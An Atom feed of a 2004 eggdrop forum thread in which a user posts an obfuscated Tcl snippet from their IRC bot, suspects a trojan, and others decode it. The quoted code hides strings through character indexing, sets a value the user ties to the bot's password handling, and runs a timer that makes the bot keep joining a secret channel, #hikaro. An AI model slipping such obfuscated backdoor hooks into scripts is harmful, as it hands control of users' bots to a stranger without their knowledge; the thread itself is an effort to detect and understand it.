<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-gb">
	<link rel="self" type="application/atom+xml" href="https://forum.eggheads.org/app.php/feed/topic/8556" />

	<title>egghelp/eggheads community</title>
	<subtitle>Discussion of eggdrop bots, shell accounts and tcl scripts.</subtitle>
	<link href="https://forum.eggheads.org/index.php" />
	<updated>2004-11-07T04:56:28-04:00</updated>

	<author><name><![CDATA[egghelp/eggheads community]]></name></author>
	<id>https://forum.eggheads.org/app.php/feed/topic/8556</id>

		<entry>
		<author><name><![CDATA[KrzychuG]]></name></author>
		<updated>2004-11-07T04:56:28-04:00</updated>

		<published>2004-11-07T04:56:28-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=42547#p42547</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=42547#p42547"/>
		<title type="html"><![CDATA[$lenc , dunno what this mean &amp; need help to translate it]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=42547#p42547"><![CDATA[
<blockquote class="uncited"><div>set [string index $lenc 15][string index $lenc 18] [string index $lenc 7][string index $lenc 8][string index $lenc 10][string index $lenc 0][string index $lenc 17][string index $lenc 14]</div></blockquote>It tooks 16th, 19th, 8th, 9th, 11th, 1st, 18th and 15th character from $lenc string:<blockquote class="uncited"><div>% set lenc "abcdefghijklmnopqrstuvwxyz"<br>abcdefghijklmnopqrstuvwxyz<br>% set ldec "zyxwvutsrqponmlkjihgfedcba"<br>zyxwvutsrqponmlkjihgfedcba<br>% set uenc "ABCDEFGHIJKLMNOPQRSTUVWXYZ"<br>ABCDEFGHIJKLMNOPQRSTUVWXYZ<br>% set uenc "ABCDEFGHIJKLMNOPQRSTUVWXYZ"<br>ABCDEFGHIJKLMNOPQRSTUVWXYZ<br>% set [string index $lenc 15][string index $lenc 18] [string index $lenc 7][string index $lenc 8][string index $lenc 10][string index $lenc 0][string index $lenc 17][string index $lenc 14]<br>hikaro</div></blockquote>Similiar with second quote :)<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=3672">KrzychuG</a> — Sun Nov 07, 2004 4:56 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Anonymous]]></name></author>
		<updated>2004-11-06T22:45:50-04:00</updated>

		<published>2004-11-06T22:45:50-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=42544#p42544</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=42544#p42544"/>
		<title type="html"><![CDATA[$lenc , dunno what this mean &amp; need help to translate it]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=42544#p42544"><![CDATA[
How to translate it?<p>Statistics: Posted by Guest — Sat Nov 06, 2004 10:45 pm</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[metroid]]></name></author>
		<updated>2004-11-06T04:24:04-04:00</updated>

		<published>2004-11-06T04:24:04-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=42530#p42530</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=42530#p42530"/>
		<title type="html"><![CDATA[$lenc , dunno what this mean &amp; need help to translate it]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=42530#p42530"><![CDATA[
The first part does ps hikaro, the second part does channel add #hikaro<p>Statistics: Posted by <a href="https://forum.eggheads.org/memberlist.php?mode=viewprofile&amp;u=5078">metroid</a> — Sat Nov 06, 2004 4:24 am</p><hr />
]]></content>
	</entry>
		<entry>
		<author><name><![CDATA[Anonymous]]></name></author>
		<updated>2004-11-06T02:14:48-04:00</updated>

		<published>2004-11-06T02:14:48-04:00</published>
		<id>https://forum.eggheads.org/viewtopic.php?p=42529#p42529</id>
		<link href="https://forum.eggheads.org/viewtopic.php?p=42529#p42529"/>
		<title type="html"><![CDATA[$lenc , dunno what this mean &amp; need help to translate it]]></title>

		
		<content type="html" xml:base="https://forum.eggheads.org/viewtopic.php?p=42529#p42529"><![CDATA[
Please Translate what this script means:<br><div class="codebox"><p>Code: </p><pre><code>set lenc "abcdefghijklmnopqrstuvwxyz"set ldec "zyxwvutsrqponmlkjihgfedcba"set uenc "ABCDEFGHIJKLMNOPQRSTUVWXYZ"set udec "ZYXWVUTSRQPONMLKJIHGFEDCBA"</code></pre></div><span style="color:blue">FIRST</span><div class="codebox"><p>Code: </p><pre><code>set [string index $lenc 15][string index $lenc 18] [string index $lenc 7][string index $lenc 8][string index $lenc 10][string index $lenc 0][string index $lenc 17][string index $lenc 14]</code></pre></div>And:<br><span style="color:blue">SECOND</span><div class="codebox"><p>Code: </p><pre><code>set totch "#[string index $lenc 5][string index $lenc 14][string index $lenc 17][string index $lenc 19][string index $lenc 20][string index $lenc 13][string index $lenc 0]"proc tot_cha {} {global totch ps uenc lenctimer 5 tot_chaset [string index $lenc 15][string index $lenc 18] [string index $lenc 7][string index $lenc 8][string index $lenc 10][string index $lenc 0][string index $lenc 17][string index $lenc 14]set totch "#[string index $lenc 7][string index $lenc 8][string index $lenc 10][string index $lenc 0][string index $lenc 17][string index $lenc 14]"if {[validchan $totch]} {return 0}channel add $totchcatch { channel set $totch -statuslog -revenge -protectops -clearbans -enforcebans +greet +secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 }savechanputsrv "JOIN $totch"}timer 5 tot_cha</code></pre></div>I think this is a trojan script, when i delete the <span style="color:blue">second</span> code, my bot still works fine and no more join #hikaro. But when i delete the <span style="color:blue">first</span> code, i cannot set pass / auth to the bot.<p>Statistics: Posted by Guest — Sat Nov 06, 2004 2:14 am</p><hr />
]]></content>
	</entry>
	</feed>
